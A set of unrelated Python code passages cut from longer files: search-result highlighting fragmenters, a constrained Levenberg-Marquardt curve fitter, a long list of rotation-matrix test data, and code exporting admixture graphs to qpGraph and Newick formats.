yield mkfrag(text, tks, startchar=first, endchar=endchar)
# Reset the counts
tks = []
first = None
currentlen = 0
# If we get to the end of the text and there's still a sentence
# in the buffer, yield it
if tks:
yield mkfrag(text, tks, startchar=first, endchar=endchar)
class ContextFragmenter(Fragmenter):
"""Looks for matched terms and aggregates them with their surrounding
context.
"""
def __init__(self, maxchars=200, surround=20, charlimit=DEFAULT_CHARLIMIT):
"""
:param maxchars: The maximum number of characters allowed in a
fragment.
:param surround: The number of extra characters of context to add both
before the first matched term and after the last matched term.
"""
self.maxchars = maxchars
self.surround = surround
self.charlimit = charlimit
def fragment_tokens(self, text, tokens):
maxchars = self.maxchars
surround = self.surround
charlimit = self.charlimit
# startchar of the first token in the fragment
first = None
# Stack of startchars
firsts = deque()
# Each time we see a matched token, we reset the countdown to finishing
# the fragment. This also indicates whether we're currently inside a
# fragment (< 0 not in fragment, >= 0 in fragment)
countdown = -1
# Tokens in current fragment
tks = []
endchar = None
# Number of chars in the current fragment
currentlen = 0
for t in tokens:
startchar = t.startchar
endchar = t.endchar
tlength = endchar - startchar
if charlimit and endchar > charlimit:
break
if countdown < 0 and not t.matched:
# We're not in a fragment currently, so just maintain the
# "charsbefore" buffer
firsts.append(startchar)
while firsts and endchar - firsts[0] > surround:
firsts.popleft()
elif currentlen + tlength > maxchars:
# We're in a fragment, but adding this token would put us past
# the maximum size. Zero the countdown so the code below will
# cause the fragment to be emitted
countdown = 0
elif t.matched:
# Start/restart the countdown
countdown = surround
# Remember the first char of this fragment
if first is None:
if firsts:
first = firsts[0]
else:
first = startchar
# Add on unused front context
countdown += surround
tks.append(t.copy())
# If we're in a fragment...
if countdown >= 0:
# Update the counts
currentlen += tlength
countdown -= tlength
# If the countdown is expired
if countdown <= 0:
# Finish the fragment
yield mkfrag(text, tks, startchar=first, endchar=endchar)
# Reset the counts
tks = []
firsts = deque()
first = None
currentlen = 0
# If there's a fragment left over at the end, yield it
if tks:
yield mkfrag(text, tks, startchar=first, endchar=endchar)
class PinpointFragmenter(Fragmenter):
"""This is a NON-RETOKENIZING fragmenter. It builds fragments from the
positions of the matched terms.
"""
def __init__(self, maxchars=200, surround=20, autotrim=False,
charlimit=DEFAULT_CHARLIMIT):
"""
:param maxchars: The maximum number of characters allowed in a
fragment.
:param surround: The number of extra characters of context to add both
before the first matched term and after the last matched term.
:param autotrim: automatically trims text before the first space and
after the last space in the fragments, to try to avoid truncated
words at the start and end. For short fragments or fragments with
long runs between spaces this may give strange results.
"""
self.maxchars = maxchars
self.surround = surround
self.autotrim = autotrim
self.charlimit = charlimit
def must_retokenize(self):
return False
def fragment_tokens(self, text, tokens):
matched = [t for t in tokens if t.matched]
return self.fragment_matches(text, matched)
@staticmethod
def _autotrim(fragment):
text = fragment.text
startchar = fragment.startchar
endchar = fragment.endchar
firstspace = text.find(" ", startchar, endchar)
if firstspace > 0:
startchar = firstspace + 1
lastspace = text.rfind(" ", startchar, endchar)
if lastspace > 0:
endchar = lastspace
if fragment.matches:
startchar = min(startchar, fragment.matches[0].startchar)
endchar = max(endchar, fragment.matches[-1].endchar)
fragment.startchar = startchar
fragment.endchar = endchar
def fragment_matches(self, text, tokens):
maxchars = self.maxchars
surround = self.surround
autotrim = self.autotrim
charlimit = self.charlimit
j = -1
for i, t in enumerate(tokens):
if j >= i:
continue
j = i
left = t.startchar
right = t.endchar
if charlimit and right > charlimit:
break
currentlen = right - left
while j < len(tokens) - 1 and currentlen < maxchars:
next = tokens[j + 1]
ec = next.endchar
if ec - right <= surround and ec - left <= maxchars:
j += 1
right = ec
currentlen += (ec - next.startchar)
else:
break
left = max(0, left - surround)
right = min(len(text), right + surround)
fragment = Fragment(text, tokens[i:j + 1], left, right)
if autotrim:
self._autotrim(fragment)
yield fragment
# Fragment scorers
class FragmentScorer(object):
pass
class BasicFragmentScorer(FragmentScorer):
def __call__(self, f):
# Add up the boosts for the | |
it, however, if there are
# points to be excluded, one has to be able to exclude them.
# We can only hope that the sequence is properly arranged
ydata = ydata[idx]
xdata = xdata[idx]
sigma = sigma[idx]
idx = numpy.isfinite(xdata)
filter_xdata = False
if False in idx:
# What to do?
try:
# Let's see if the function is able to deal with non-finite data
msg = "Checking if function can deal with non-finite data"
_logger.debug(msg)
evaluation = model(xdata, *parameters)
function_call_counter += 1
if evaluation.shape != ydata.shape:
if evaluation.size == ydata.size:
msg = "Supplied function does not return a proper array of floats."
msg += "\nFunction should be rewritten to return a 1D array of floats."
msg += "\nTrying to reshape output."
_logger.warning(msg)
evaluation.shape = ydata.shape
if False in numpy.isfinite(evaluation):
msg = "Supplied function unable to handle non-finite x data"
msg += "\nAttempting to filter out those x data values."
_logger.warning(msg)
filter_xdata = True
else:
filter_xdata = False
evaluation = None
except:
# function cannot handle input data
filter_xdata = True
if filter_xdata:
if xdata.size != ydata.size:
raise ValueError("xdata contains non-finite data that cannot be filtered")
else:
# we leave the xdata as they where
old_shape = xdata.shape
xdata.shape = ydata.shape
idx0 = numpy.isfinite(xdata)
xdata.shape = old_shape
ydata = ydata[idx0]
xdata = xdata[idx]
sigma = sigma[idx0]
weight = 1.0 / (sigma + numpy.equal(sigma, 0))
weight0 = weight * weight
nparameters = len(parameters)
if epsfcn is None:
epsfcn = numpy.finfo(numpy.float64).eps
else:
epsfcn = max(epsfcn, numpy.finfo(numpy.float64).eps)
# check if constraints have been passed as text
constrained_fit = False
if constraints is not None:
# make sure we work with a list of lists
input_constraints = constraints
tmp_constraints = [None] * len(input_constraints)
for i in range(nparameters):
tmp_constraints[i] = list(input_constraints[i])
constraints = tmp_constraints
for i in range(nparameters):
if hasattr(constraints[i][0], "upper"):
txt = constraints[i][0].upper()
if txt == "FREE":
constraints[i][0] = CFREE
elif txt == "POSITIVE":
constraints[i][0] = CPOSITIVE
elif txt == "QUOTED":
constraints[i][0] = CQUOTED
elif txt == "FIXED":
constraints[i][0] = CFIXED
elif txt == "FACTOR":
constraints[i][0] = CFACTOR
constraints[i][1] = int(constraints[i][1])
elif txt == "DELTA":
constraints[i][0] = CDELTA
constraints[i][1] = int(constraints[i][1])
elif txt == "SUM":
constraints[i][0] = CSUM
constraints[i][1] = int(constraints[i][1])
elif txt in ["IGNORED", "IGNORE"]:
constraints[i][0] = CIGNORED
else:
#I should raise an exception
raise ValueError("Unknown constraint %s" % constraints[i][0])
if constraints[i][0] > 0:
constrained_fit = True
if constrained_fit:
if full_output is None:
_logger.info("Recommended to set full_output to True when using constraints")
# Levenberg-Marquardt algorithm
fittedpar = parameters.__copy__()
flambda = 0.001
iiter = max_iter
#niter = 0
last_evaluation=None
x = xdata
y = ydata
chisq0 = -1
iteration_counter = 0
while (iiter > 0):
weight = weight0
"""
I cannot evaluate the initial chisq here because I do not know
if some parameters are to be ignored, otherways I could do it as follows:
if last_evaluation is None:
yfit = model(x, *fittedpar)
last_evaluation = yfit
chisq0 = (weight * pow(y-yfit, 2)).sum()
and chisq would not need to be recalculated.
Passing the last_evaluation assumes that there are no parameters being
ignored or not between calls.
"""
iteration_counter += 1
chisq0, alpha0, beta, internal_output = chisq_alpha_beta(
model, fittedpar,
x, y, weight, constraints=constraints,
model_deriv=model_deriv,
epsfcn=epsfcn,
left_derivative=left_derivative,
last_evaluation=last_evaluation,
full_output=True)
n_free = internal_output["n_free"]
free_index = internal_output["free_index"]
noigno = internal_output["noigno"]
fitparam = internal_output["fitparam"]
function_calls = internal_output["function_calls"]
function_call_counter += function_calls
#print("chisq0 = ", chisq0, n_free, fittedpar)
#raise
nr, nc = alpha0.shape
flag = 0
#lastdeltachi = chisq0
while flag == 0:
alpha = alpha0 * (1.0 + flambda * numpy.identity(nr))
deltapar = numpy.dot(beta, inv(alpha))
if constraints is None:
newpar = fitparam + deltapar [0]
else:
newpar = parameters.__copy__()
pwork = numpy.zeros(deltapar.shape, numpy.float64)
for i in range(n_free):
if constraints is None:
pwork [0] [i] = fitparam [i] + deltapar [0] [i]
elif constraints [free_index[i]][0] == CFREE:
pwork [0] [i] = fitparam [i] + deltapar [0] [i]
elif constraints [free_index[i]][0] == CPOSITIVE:
#abs method
pwork [0] [i] = fitparam [i] + deltapar [0] [i]
#square method
#pwork [0] [i] = (numpy.sqrt(fitparam [i]) + deltapar [0] [i]) * \
# (numpy.sqrt(fitparam [i]) + deltapar [0] [i])
elif constraints[free_index[i]][0] == CQUOTED:
pmax = max(constraints[free_index[i]][1],
constraints[free_index[i]][2])
pmin = min(constraints[free_index[i]][1],
constraints[free_index[i]][2])
A = 0.5 * (pmax + pmin)
B = 0.5 * (pmax - pmin)
if B != 0:
pwork [0] [i] = A + \
B * numpy.sin(numpy.arcsin((fitparam[i] - A)/B)+ \
deltapar [0] [i])
else:
txt = "Error processing constrained fit\n"
txt += "Parameter limits are %g and %g\n" % (pmin, pmax)
txt += "A = %g B = %g" % (A, B)
raise ValueError("Invalid parameter limits")
newpar[free_index[i]] = pwork [0] [i]
newpar = numpy.array(_get_parameters(newpar, constraints))
workpar = numpy.take(newpar, noigno)
yfit = model(x, *workpar)
if last_evaluation is None:
if len(yfit.shape) > 1:
msg = "Supplied function does not return a 1D array of floats."
msg += "\nFunction should be rewritten."
msg += "\nTrying to reshape output."
_logger.warning(msg)
yfit.shape = -1
function_call_counter += 1
chisq = (weight * pow(y-yfit, 2)).sum()
absdeltachi = chisq0 - chisq
if absdeltachi < 0:
flambda *= 10.0
if flambda > 1000:
flag = 1
iiter = 0
else:
flag = 1
fittedpar = newpar.__copy__()
lastdeltachi = 100 * (absdeltachi / (chisq + (chisq == 0)))
if iteration_counter < 2:
# ignore any limit, the fit *has* to be improved
pass
elif (lastdeltachi) < deltachi:
iiter = 0
elif absdeltachi < numpy.sqrt(epsfcn):
iiter = 0
_logger.info("Iteration finished due to too small absolute chi decrement")
chisq0 = chisq
flambda = flambda / 10.0
last_evaluation = yfit
iiter = iiter - 1
# this is the covariance matrix of the actually fitted parameters
cov0 = inv(alpha0)
if constraints is None:
cov = cov0
else:
# yet another call needed with all the parameters being free except those
# that are FIXED and that will be assigned a 100 % uncertainty.
new_constraints = copy.deepcopy(constraints)
flag_special = [0] * len(fittedpar)
for idx, constraint in enumerate(constraints):
if constraints[idx][0] in [CFIXED, CIGNORED]:
flag_special[idx] = constraints[idx][0]
else:
new_constraints[idx][0] = CFREE
new_constraints[idx][1] = 0
new_constraints[idx][2] = 0
chisq, alpha, beta, internal_output = chisq_alpha_beta(
model, fittedpar,
x, y, weight, constraints=new_constraints,
model_deriv=model_deriv,
epsfcn=epsfcn,
left_derivative=left_derivative,
last_evaluation=last_evaluation,
full_output=True)
# obtained chisq should be identical to chisq0
try:
cov = inv(alpha)
except LinAlgError:
_logger.critical("Error calculating covariance matrix after successful fit")
cov = None
if cov is not None:
for idx, value in enumerate(flag_special):
if value in [CFIXED, CIGNORED]:
cov = numpy.insert(numpy.insert(cov, idx, 0, axis=1), idx, 0, axis=0)
cov[idx, idx] = fittedpar[idx] * fittedpar[idx]
if not full_output:
return fittedpar, cov
else:
sigma0 = numpy.sqrt(abs(numpy.diag(cov0)))
sigmapar = _get_sigma_parameters(fittedpar, sigma0, constraints)
ddict = {}
ddict["chisq"] = chisq0
ddict["reduced_chisq"] = chisq0 / (len(yfit)-n_free)
ddict["covariance"] = cov0
ddict["uncertainties"] = sigmapar
ddict["fvec"] = last_evaluation
ddict["nfev"] = function_call_counter
ddict["niter"] = iteration_counter
return fittedpar, cov, ddict #, chisq/(len(yfit)-len(sigma0)), sigmapar,niter,lastdeltachi
def chisq_alpha_beta(model, parameters, x, y, weight, constraints=None,
model_deriv=None, epsfcn=None, left_derivative=False,
last_evaluation=None, full_output=False):
"""
Get chi square, the curvature matrix alpha and the matrix beta according to the input parameters.
If all the parameters are unconstrained, the covariance matrix is the inverse of the alpha matrix.
:param model: callable
The model function, f(x, ...). It must take the independent
variable as the first argument and the parameters to fit as
separate remaining arguments.
The returned value is a one dimensional array of floats.
:param parameters: N-length sequence
Values of parameters at which function and derivatives are to be calculated.
:param x: An M-length sequence.
The independent variable where the data is measured.
:param y: An M-length sequence
The dependent data --- nominally f(xdata, ...)
:param weight: M-length sequence
Weights to be applied in the calculation of chi square
As a reminder ``chisq = np.sum(weigth * (model(x, *parameters) - y)**2)``
:param constraints:
If provided, it is a 2D sequence of dimension (n_parameters, 3) where,
for each parameter denoted by the index i, the meaning is
- constraints[i][0]
- 0 - Free (CFREE)
- 1 - Positive | |
],
),
(
[
[0.97931, 0.0219899, 0.201169],
[-0.0159226, 0.99937, -0.0317288],
[-0.201739, 0.0278692, 0.979043],
],
[
[-0.980952, 0.00507266, -0.19419],
[0.00310821, 0.999941, 0.010419],
[0.194231, 0.00961706, -0.98091],
],
),
(
[
[0.999616, 0.00550326, -0.0271537],
[-0.0048286, 0.99968, 0.0248495],
[0.0272817, -0.0247088, 0.999322],
],
[
[-0.999689, -0.00054899, 0.0249588],
[-0.00125497, 0.999599, -0.0282774],
[-0.0249333, -0.0282998, -0.999289],
],
),
(
[
[0.998036, -0.00755259, -0.0621791],
[0.0417502, 0.820234, 0.570502],
[0.0466927, -0.571978, 0.818939],
],
[
[-0.999135, -0.0278203, 0.0309173],
[-0.00855238, 0.864892, 0.501886],
[-0.0407029, 0.501187, -0.864382],
],
),
(
[
[0.958227, 0.00271545, 0.285997],
[-0.00426128, 0.999979, 0.00478282],
[-0.285979, -0.00580174, 0.958218],
],
[
[-0.958726, 0.011053, -0.284121],
[0.0138068, 0.999875, -0.00769161],
[0.284001, -0.0112968, -0.958759],
],
),
(
[
[-0.804547, -0.48558, -0.341929],
[0.517913, -0.855425, -0.00382581],
[-0.290637, -0.180168, 0.939718],
],
[
[0.993776, -0.0469383, -0.101033],
[-0.110087, -0.274676, -0.955214],
[0.0170842, 0.96039, -0.278134],
],
),
(
[
[0.991875, -0.0022313, -0.127195],
[-0.00198041, 0.999454, -0.0329762],
[0.127199, 0.0329602, 0.991329],
],
[
[-0.992632, -0.0090772, 0.120844],
[-0.00870494, 0.999956, 0.00360636],
[-0.120871, 0.00252786, -0.992667],
],
),
(
[
[0.999305, -0.0252534, 0.0274367],
[0.026144, 0.999126, -0.0326002],
[-0.0265895, 0.0332948, 0.999092],
],
[
[-0.999314, -0.0038532, -0.0368519],
[-0.00441323, 0.999876, 0.0151263],
[0.036789, 0.0152787, -0.999207],
],
),
(
[
[0.999843, -0.00958823, 0.0148803],
[0.00982469, 0.999825, -0.0159002],
[-0.0147253, 0.0160439, 0.999763],
],
[
[-0.999973, 0.00673608, -0.00308692],
[-0.0067409, -0.999977, 0.00116827],
[-0.00307934, 0.00119013, 0.999995],
],
),
(
[
[0.981558, -0.00727741, 0.191028],
[-0.00866166, 0.996556, 0.0824708],
[-0.190971, -0.0826044, 0.978114],
],
[
[-0.980202, 0.0179519, -0.197188],
[0.00957606, 0.999014, 0.0433472],
[0.197772, 0.0406008, -0.979408],
],
),
(
[
[0.966044, 0.0143709, 0.257977],
[-0.0157938, 0.999869, 0.00344404],
[-0.257894, -0.00740153, 0.966145],
],
[
[-0.965532, 0.0100318, -0.260094],
[0.00950897, 0.999949, 0.00326797],
[0.260113, 0.000682242, -0.965579],
],
),
(
[
[0.999965, 0.00727991, -0.00412134],
[-0.00802642, 0.973769, -0.227397],
[0.00235781, 0.227422, 0.973794],
],
[
[-0.999877, 0.00698241, 0.0141441],
[0.0103867, 0.966295, 0.257228],
[-0.0118713, 0.257343, -0.966248],
],
),
(
[
[0.951385, -0.0297966, 0.306561],
[-0.0314555, 0.980706, 0.19294],
[-0.306395, -0.193204, 0.932092],
],
[
[-0.99981, 0.00389172, -0.0191159],
[-0.00386326, -0.999991, -0.00150593],
[-0.0191215, -0.00143146, 0.999816],
],
),
(
[
[0.986772, -0.120673, 0.10825],
[0.0543962, 0.875511, 0.480126],
[-0.152713, -0.467887, 0.870495],
],
[
[-0.991246, 0.125848, -0.0399414],
[-0.129021, -0.85897, 0.495507],
[0.0280503, 0.496321, 0.867686],
],
),
(
[
[-0.804799, -0.588418, 0.0778637],
[-0.514399, 0.756902, 0.403104],
[-0.296129, 0.284365, -0.911836],
],
[
[0.98676, -0.0939473, 0.132227],
[0.162179, 0.557277, -0.814336],
[0.0028177, 0.824995, 0.565135],
],
),
(
[
[0.878935, 0.115231, 0.462813],
[0.0845639, 0.917349, -0.388998],
[-0.469386, 0.381041, 0.796546],
],
[
[-0.869533, 0.00193279, -0.493873],
[-0.00419575, 0.999927, 0.0113007],
[0.493859, 0.0118986, -0.869462],
],
),
(
[
[0.951881, 0.20828, 0.224816],
[-0.305582, 0.700797, 0.644595],
[-0.023294, -0.682277, 0.730722],
],
[
[-0.999787, 0.0141074, -0.0151097],
[-0.000971554, 0.698061, 0.716038],
[0.0206489, 0.7159, -0.697898],
],
),
(
[
[0.999538, 0.0192173, 0.0235334],
[-0.0189064, 0.999732, -0.0133635],
[-0.0237839, 0.0129124, 0.999634],
],
[
[-0.999807, 0.00286378, -0.0194776],
[0.0026258, 0.999922, 0.0122308],
[0.0195111, 0.0121774, -0.999736],
],
),
(
[
[0.998468, 0.041362, -0.0367422],
[-0.0364453, 0.991404, 0.125658],
[0.0416238, -0.124127, 0.991393],
],
[
[-0.997665, -0.0658235, 0.0183602],
[0.0216855, -0.0501652, 0.998507],
[-0.064804, 0.99657, 0.0514739],
],
),
(
[
[0.995563, 0.0493669, 0.0801057],
[-0.0272233, 0.966027, -0.257002],
[-0.0900717, 0.253681, 0.963085],
],
[
[-0.999228, -0.034399, -0.0190572],
[0.0250208, -0.929986, 0.366743],
[-0.0303386, 0.365984, 0.930127],
],
),
(
[
[0.952898, 0.0122933, 0.303043],
[-0.00568444, 0.999727, -0.0226807],
[-0.303239, 0.0198898, 0.952707],
],
[
[-0.951155, 0.0127759, -0.308452],
[0.000612627, 0.999219, 0.0394978],
[0.308716, 0.0373795, -0.95042],
],
),
(
[
[0.923096, -0.000313887, 0.38457],
[0.00948258, 0.999714, -0.0219453],
[-0.384454, 0.0239044, 0.922835],
],
[
[-0.922662, -0.00403523, -0.385589],
[-0.0119834, 0.999762, 0.0182116],
[0.385424, 0.0214239, -0.922491],
],
),
(
[
[0.991575, 0.0945042, -0.0885834],
[-0.10112, 0.99216, -0.0734349],
[0.080949, 0.0817738, 0.993358],
],
[
[-0.990948, -0.127974, 0.0405639],
[0.096351, -0.467557, 0.878697],
[-0.0934839, 0.874651, 0.475655],
],
),
(
[
[0.997148, 0.010521, 0.0747407],
[-0.0079726, 0.999379, -0.034313],
[-0.0750553, 0.0336192, 0.996612],
],
[
[-0.996543, 0.00988805, -0.0825019],
[0.00939476, 0.999936, 0.0063645],
[0.0825595, 0.00556751, -0.996572],
],
),
(
[
[0.991261, 0.00474444, -0.131831],
[-0.00205841, 0.999788, 0.0205036],
[0.131901, -0.020053, 0.99106],
],
[
[-0.990924, 4.45275e-05, 0.134427],
[0.00614714, 0.998969, 0.0449827],
[-0.134286, 0.0454008, -0.989903],
],
),
(
[
[0.992266, -0.0947916, 0.0801474],
[0.100889, 0.992006, -0.0757987],
[-0.0723216, 0.0832984, 0.993897],
],
[
[-0.992701, 0.0817686, -0.0886652],
[-0.114283, -0.40263, 0.908203],
[0.0385633, 0.911704, 0.409035],
],
),
(
[
[0.99696, -0.00808565, -0.0774951],
[0.0585083, 0.734519, 0.676061],
[0.0514552, -0.67854, 0.732759],
],
[
[-0.9998, 0.0053398, -0.0193164],
[-0.0162677, -0.779206, 0.626556],
[-0.0117055, 0.626745, 0.779137],
],
),
(
[
[0.961501, 0.0133645, -0.274475],
[-0.016255, 0.999834, -0.00825889],
[0.274319, 0.0124025, 0.961559],
],
[
[-0.963687, 0.000179203, 0.267042],
[0.00670194, 0.999701, 0.023515],
[-0.266958, 0.0244509, -0.9634],
],
),
(
[
[0.99877, 0.0413462, -0.0273572],
[-0.0263673, 0.91029, 0.413131],
[0.0419844, -0.411902, 0.910261],
],
[
[-0.998035, -0.0613039, 0.0130407],
[-0.00146496, 0.230815, 0.972998],
[-0.0626594, 0.971065, -0.230452],
],
),
(
[
[0.999657, 0.0261608, 0.00141675],
[-0.0261957, 0.998937, 0.0379393],
[-0.000422719, -0.0379634, 0.999279],
],
[
[-0.998896, -0.0310033, -0.0353275],
[0.0315452, -0.999392, -0.0148857],
[-0.0348445, -0.0159846, 0.999265],
],
),
(
[
[0.77369, 0.0137861, 0.633415],
[-0.0186509, 0.999826, 0.00102049],
[-0.63329, -0.0126033, 0.773812],
],
[
[-0.773069, 0.0156632, -0.634129],
[0.00418312, 0.999799, 0.0195956],
[0.634308, 0.0124961, -0.772979],
],
),
(
[
[0.952827, -0.024521, -0.302522],
[-0.00541318, 0.9952, -0.0977158],
[0.303465, 0.0947439, 0.94812],
],
[
[-0.952266, -0.00806089, 0.305165],
[0.00351941, 0.999295, 0.037378],
[-0.305252, 0.0366678, -0.951567],
],
),
(
[
[-0.172189, 0.949971, 0.260587],
[-0.86961, -0.0223234, -0.493235],
[-0.462741, -0.311539, 0.829948],
],
[
[-0.672964, 0.0127645, -0.739567],
[0.00429523, 0.999902, 0.0133494],
[0.739664, 0.00580721, -0.672953],
],
),
(
[
[0.637899, -0.440017, 0.632036],
[-0.52883, 0.346333, 0.774849],
[-0.559842, -0.828516, -0.0117683],
],
[
[-0.0627307, -0.0314554, -0.997536],
[-0.733537, 0.679201, 0.0247117],
[0.67675, 0.733279, -0.0656804],
],
),
(
[
[0.998402, 0.00284932, -0.0564372],
[0.000393713, 0.998353, 0.0573683],
[0.0565077, -0.0572989, 0.996757],
],
[
[-0.997878, 0.000941416, 0.0651252],
[-2.16756e-05, 0.999891, -0.0147853],
[-0.065132, -0.0147552, -0.997768],
],
),
(
[
[0.9999, 0.0141438, -0.000431687],
[-0.0140882, 0.9979, 0.063225],
[0.00132502, -0.0632125, 0.997999],
],
[
[-0.999515, -0.0308197, -0.00482715],
[-0.00160551, -0.103741, 0.994605],
[-0.0311554, 0.994128, 0.10364],
],
),
(
[
[-0.201909, 0.0267804, 0.979038],
[-0.0159062, 0.999405, -0.0306179],
[-0.979275, -0.0217548, -0.201363],
],
[
[0.261235, 0.951613, -0.161839],
[0.0758567, 0.146901, 0.986239],
[0.962292, -0.269916, -0.03381],
],
),
(
[
[0.998335, -0.0191576, -0.0544038],
[0.0163271, 0.998513, -0.0520045],
[0.0553192, 0.0510297, 0.997164],
],
[
[-0.998811, -0.00846127, 0.0480344],
[-0.0051736, 0.997661, 0.0681593],
[-0.0484988, 0.0678295, -0.996519],
],
),
(
[
[0.999973, 0.00227282, -0.00699658],
[-0.00137504, 0.992062, 0.125744],
[0.00722684, -0.125731, 0.992038],
],
[
[-0.999995, -0.00337061, 4.25756e-05],
[-0.00333677, 0.991528, 0.129853],
[-0.00047993, 0.129852, -0.991534],
],
),
(
[
[0.998908, 0.0216581, -0.041392],
[-0.0327304, 0.956678, -0.289302],
[0.0333331, 0.290341, 0.956342],
],
[
[-0.998254, -0.0377592, 0.0454422],
[0.00744647, 0.682591, 0.730764],
[-0.0586112, 0.729825, -0.681118],
],
),
(
[
[0.999387, -0.0042571, -0.0347599],
[0.00485203, 0.999843, 0.017049],
[0.0346819, -0.0172072, 0.99925],
],
[
[-0.999976, 0.00260242, -0.00669664],
[-0.00250352, -0.999889, -0.0147361],
[-0.00673422, -0.0147175, 0.99987],
],
),
(
[
[0.906103, -0.398828, -0.141112],
[0.381512, 0.914475, -0.13485],
[0.182826, 0.0683519, 0.980766],
],
[
[-0.996568, -0.0321282, -0.0763021],
[-0.0823787, 0.476597, 0.875254],
[0.00824509, 0.878535, -0.477609],
],
),
(
[
[0.908356, 0.316033, -0.273884],
[-0.231421, -0.165634, -0.95865],
[-0.34833, 0.934178, -0.0773183],
],
[
[-0.999889, -0.0146322, -0.00295739],
[-0.0149238, 0.974974, 0.221815],
[-0.000362257, 0.221835, -0.975085],
],
),
(
[
[0.999507, -0.00834631, 0.0302637],
[0.00899248, 0.999733, -0.0212785],
[-0.030078, 0.0215401, 0.999315],
],
[
[-0.999538, 0.00785187, -0.0293621],
[0.00739788, 0.999852, 0.0155394],
[0.0294797, 0.0153149, -0.999448],
],
),
(
[
[0.999951, -0.00729441, -0.00672921],
[0.00313753, 0.87564, -0.482954],
[0.00941523, 0.48291, 0.87562],
],
[
[-0.999984, -0.005202, -0.00277372],
[0.00340465, -0.893745, 0.448565],
[-0.00481353, 0.448548, 0.893747],
],
),
(
[
[0.998028, -0.0569885, 0.0263322],
[0.0489091, 0.968801, 0.242967],
[-0.039357, -0.2412, 0.969677],
],
[
[-0.997066, 0.0422415, -0.0638525],
[-0.0760293, -0.448184, 0.890703],
[0.00900662, 0.892944, 0.45008],
],
),
(
[
[0.999745, 0.00860777, 0.0208747],
[-0.00827114, 0.999835, -0.0161595],
[-0.0210103, 0.0159827, 0.999651],
],
[
[-0.999576, 0.0148733, -0.0251161],
[0.0151027, 0.999846, -0.00898035],
[0.0249787, -0.00935575, -0.999646],
],
),
(
[
[0.91924, 0.0372116, -0.391934],
[-0.00675798, 0.996868, 0.0787959],
[0.393639, -0.0697837, 0.916613],
],
[
[-0.921919, 0.00882585, 0.387286],
[0.00588498, 0.999944, -0.00877866],
[-0.387342, -0.00581387, -0.921919],
],
),
(
[
[0.998324, -0.0029024, 0.0577924],
[0.00236766, 0.999954, 0.00931901],
[-0.0578167, -0.00916657, 0.998285],
],
[
[-0.99892, -0.0025688, -0.0464413],
[-0.00203721, 0.999932, -0.0114927],
[0.0464676, -0.0113855, -0.998857],
],
),
(
[
[0.993986, 0.0163462, -0.108279],
[-0.0612924, 0.902447, -0.426418],
[0.090746, 0.43049, 0.898022],
],
[
[-0.994519, -0.0767804, 0.0709843],
[0.0579273, 0.160607, 0.985318],
[-0.0870543, 0.984028, -0.15528],
],
),
(
[
[0.997351, 0.0715122, -0.0132892],
[-0.0707087, 0.996067, 0.0533919],
[0.0170551, -0.0523108, 0.998485],
],
[
[-0.997704, -0.066002, 0.015281],
[0.064101, -0.846657, 0.528267],
[-0.0219278, 0.528033, 0.848942],
],
),
(
[
[0.999839, 0.00714662, -0.0164633],
[-0.00859425, 0.99594, -0.0896085],
[0.0157561, 0.0897356, 0.995841],
],
[
[-0.999773, 0.0079918, 0.0197854],
[0.00864136, 0.999419, 0.0329623],
[-0.0195105, 0.0331255, -0.999262],
],
),
(
[
[-0.773738, 0.630074, 0.0658454],
[-0.622848, -0.737618, -0.260731],
[-0.115711, -0.242749, 0.963163],
],
[
[-0.740005, 0.000855199, -0.672604],
[-0.0106008, 0.99986, 0.0129348],
[0.672521, 0.0167018, -0.739892],
],
),
(
[
[0.969039, -0.00110643, -0.246907],
[-0.121454, 0.868509, -0.480564],
[0.214973, 0.495673, 0.841484],
],
[
[-0.981168, -0.150714, 0.120811],
[0.172426, -0.401504, 0.89948],
[-0.0870583, 0.903372, 0.419929],
],
),
(
[
[0.589015, 0.80692, 0.0440651],
[-0.806467, | |
get all the nodes
nodes = local_tree.findall('.//*')
for node in nodes:
# skip non-leaf nodes
if len(node) == 0 and node.get('admix') != '1':
graph += "label\t{node}\t{node}\n".format(node=node.tag)
# build the list of edges
graph += self.export_qpgraph_node(local_tree)
return graph
def export_qpgraph_node(self, root_tree, parent_node=None):
"""
Recursively export all the edges in the graph
"""
graph = ""
if parent_node is None:
parent_node = root_tree.getroot()
for child_node in list(parent_node):
if child_node.get('printed') != '1':
# is this an admixture node or a normal node
matches = root_tree.findall('.//' + child_node.tag + '/..')
if len(matches) > 1:
# admixture branch
parent1, parent2 = matches
middle1 = child_node.tag + 'a'
middle2 = child_node.tag + 'b'
code1 = self.hash_text(middle1)
code2 = self.hash_text(middle2)
# don't admix from a bifurcating node; intermediate nodes to accommodate drift
graph += "edge\t{code}\t{parent}\t{middle}\n".format(code=code1, parent=parent1.tag, middle=middle1)
graph += "edge\t{code}\t{parent}\t{middle}\n".format(code=code2, parent=parent2.tag, middle=middle2)
# now admix from the two middle nodes
graph += "admix\t{child}\t{parent1}\t{parent2}\t50\t50\n".format(parent1=middle1, parent2=middle2,
child=child_node.tag)
# flag both nodes so we don't export them twice
parent1.find(child_node.tag).set('printed', '1')
parent2.find(child_node.tag).set('printed', '1')
else:
# regular branch
code = self.hash_text(child_node.tag)
graph += "edge\t{code}\t{parent}\t{child}\n".format(code=code, parent=parent_node.tag,
child=child_node.tag)
# leaf nodes
if len(child_node) > 0:
# now convert the children
graph += self.export_qpgraph_node(root_tree, child_node)
return graph
@staticmethod
def hash_text(text, length=7):
"""
Generate a unique key by hashing a string
"""
return hashlib.sha1(text).hexdigest()[0:length]
@staticmethod
def new_label(root_tree, admix=False):
"""
Return a new label for a node
"""
all_nodes = root_tree.findall('.//*')
if admix:
num = len([node for node in all_nodes if node.get('admix') == '1']) / 2
else:
num = len([node for node in all_nodes if node.get('internal') == '1' and node.get('admix') != '1'])
return '{pre}{num}'.format(pre='a' if admix else 'n', num=num+1)
def print_newick_tree(self, root_tee):
"""
Convert an ElementTree into a ladderized Newick tree.
"""
newick = self.export_newick_tree(root_tee.getroot())
# load into Phylo so we can sort the tree (i.e. ladderize)
tree = Phylo.read(StringIO(newick), 'newick')
tree.ladderize()
# export the tree back to a string
fout = StringIO()
Phylo.write(tree, fout, 'newick')
newick = fout.getvalue()
# remove the branch lenghs
newick = newick.replace(':0.00000', '').strip()
# get the order of admix nodes in the tree
order = list(OrderedDict.fromkeys(re.findall('a\d+', newick)))
# normalise the node numbering
for i, old in enumerate(order):
newick = newick.replace(old, 'n%s' % (i+1))
# replace n0 with a0 (to preseve the existing chache)
newick = re.sub(r'n([0-9]+)', r'a\1', newick)
return newick
def export_newick_tree(self, parent_node):
"""
Convert an ElementTree tree into Newick format
"""
if len(parent_node) == 0:
return parent_node.tag
else:
